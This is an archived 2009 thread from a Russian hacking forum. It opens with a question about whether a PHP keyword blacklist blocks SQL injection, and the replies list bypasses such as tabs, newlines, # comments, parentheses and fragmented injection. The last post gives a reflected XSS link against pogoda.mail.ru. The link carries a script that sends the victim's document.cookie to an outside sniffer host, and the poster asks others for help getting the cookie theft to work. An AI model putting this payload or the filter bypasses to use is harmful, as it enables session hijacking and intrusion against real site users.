ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #8901  
Старый 11.09.2009, 23:24
IND1G0
Новичок
Регистрация: 21.09.2008
Сообщений: 9
Провел на форуме:
69313

Репутация: 1
По умолчанию

Всем привет. Такой вопрос, сможет ли отгородить от скл иньекций, класс который обрабатывает все POST и GET запросы и если находит в них такие запросы как:
' -- '
' /* '
' %00 '
срабатывает die();
 

  #8902  
Старый 11.09.2009, 23:25
BlackSun
Members of Antichat - Level 5
Регистрация: 01.04.2007
Сообщений: 1,268
Провел на форуме:
10046345

Репутация: 4589


По умолчанию

Нет.
 

  #8903  
Старый 11.09.2009, 23:26
IND1G0
Новичок
Регистрация: 21.09.2008
Сообщений: 9
Провел на форуме:
69313

Репутация: 1
По умолчанию

Почему не защитит? Как можно обойти?
а если добавить в фильтр отсеивание запросов таких как union,select и т.д?

Последний раз редактировалось IND1G0; 11.09.2009 в 23:31..
 

  #8904  
Старый 11.09.2009, 23:37
DrAssault
Участник форума
Регистрация: 14.11.2008
Сообщений: 149
Провел на форуме:
950638

Репутация: 256
Отправить сообщение для DrAssault с помощью ICQ
По умолчанию

Цитата:
Сообщение от IND1G0  
Почему не защитит? Как можно обойти?
Не надо изобретать велосипед, всё уже придуманно до нас, фильтруй не фильтруй, а что то да забудешь, да и глупо это ... А обойти это можно очень легко

Цитата:
Сообщение от IND1G0  
а если добавить в фильтр отсеивание запросов таких как union,select и т.д?
Тоже лажа выйдет Обходится легко, ты лучше предоставь скрипт, а мы тебе скажем, как обойти

Последний раз редактировалось DrAssault; 11.09.2009 в 23:40..
 

  #8905  
Старый 11.09.2009, 23:39
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

Цитата:
Сообщение от IND1G0  
Почему не защитит? Как можно обойти?
а если добавить в фильтр отсеивание запросов таких как union,select и т.д?
не нужно писать свои чудофильтры, есть стандартные функции, просто нужно научиться ими пользоваться.
https://forum.antichat.ru/thread30641.html
 

  #8906  
Старый 11.09.2009, 23:40
BlackSun
Members of Antichat - Level 5
Регистрация: 01.04.2007
Сообщений: 1,268
Провел на форуме:
10046345

Репутация: 4589


По умолчанию

Цитата:
Сообщение от IND1G0  
Почему не защитит? Как можно обойти?
а если добавить в фильтр отсеивание запросов таких как union,select и т.д?
Что ты херней то страдаешь? Фильтруй параметры через addslashes и все.
 

  #8907  
Старый 11.09.2009, 23:43
IND1G0
Новичок
Регистрация: 21.09.2008
Сообщений: 9
Провел на форуме:
69313

Репутация: 1
По умолчанию

Допустим вот
PHP код:
class InitVars {
# Недопустимые слова в запросах
        
var $deny_words = array("union","char","select","update","group","order","benchmark");

function 
checkVars()# Метод проверяет $_GET и $_POST переменные на наличие опасных данных и SQL инъекций
{
global 
$DB;
    
//Проверка опасных данных.
    
$_VAR array_merge $_POST$_GET);
    
    foreach(
$_VAR as $_ind => $_val
    {
        
$exp explode(" ",$_val);
        foreach(
$exp as $ind => $val
        {
            if(
in_array(strtolower($val),$this->deny_words) OR stristr($val,"--") OR stristr($val,"/*") OR stristr($val,"%00")) $this->antihack("Ваш запрос не может быть обработан системой.");
        }
    }
}


Те кто меня учит фильтровать отвечаю - не надо меня учить я и сам все прекрасно знаю, как все фильтруется...я задал другой вопрос...
 

  #8908  
Старый 11.09.2009, 23:48
BlackSun
Members of Antichat - Level 5
Регистрация: 01.04.2007
Сообщений: 1,268
Провел на форуме:
10046345

Репутация: 4589


По умолчанию

И ты уверен, что все и всегда юзают пробел? Что будет с твоим фильтром, если вместо пробела окажется табуляция или переход на новую строку? Запрос так же можно обрезать с помошью #. И не забывай о фрагментированных иньекциях (кавычку отфильтровали, но слеш - нет, благодаря чему, в зависимости от запроса, один хер можно провести иньекцию). Ах да, можно обойтись и без табов с каретками, юзая скобки.

Последний раз редактировалось BlackSun; 11.09.2009 в 23:52..
 

  #8909  
Старый 12.09.2009, 00:01
IND1G0
Новичок
Регистрация: 21.09.2008
Сообщений: 9
Провел на форуме:
69313

Репутация: 1
По умолчанию

спасибо, все понял
 

  #8910  
Старый 12.09.2009, 17:40
Cehennem
Banned
Регистрация: 03.06.2009
Сообщений: 28
Провел на форуме:
82669

Репутация: -26
По умолчанию

Опять вопросик у меня.
Нашёл xss:
http://pogoda.mail.ru/favcity/citytune.html?action=tune&city=%22%3E%3Cscript%3Ea lert(%27xss%27)%3C/script%3E
Захожу на ссылку срабатывает alert и показывает рамку xss.
Пошёл на сниффер http://hacker-pro.net/sniffer/ и сделал редикет, но не сработало, даже взов не бросает снифферу, так-как лог пустой.
Ну решил поменять сниффер и пошёл на сниффер www.sniffer.xaknet.ru и сделал следующее:
вставил ссылку из сниффер вместо alert:
http://pogoda.mail.ru/favcity/citytune.html?action=tune&city="><script>img = new Image(); img.src = "http://sniffer.xaknet.ru/smiles/img__1392.gif?"+document.cookie;</script>

и так испробовал несколько ссылок, но лог ПУСТОЙ! Что делать?
А можете сами быстринко поставить нужную ссылку и джать мне адрес сниффера, а потом я буду эксприментировать и найду разницу и свою ошибку.

Поможете?
 
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ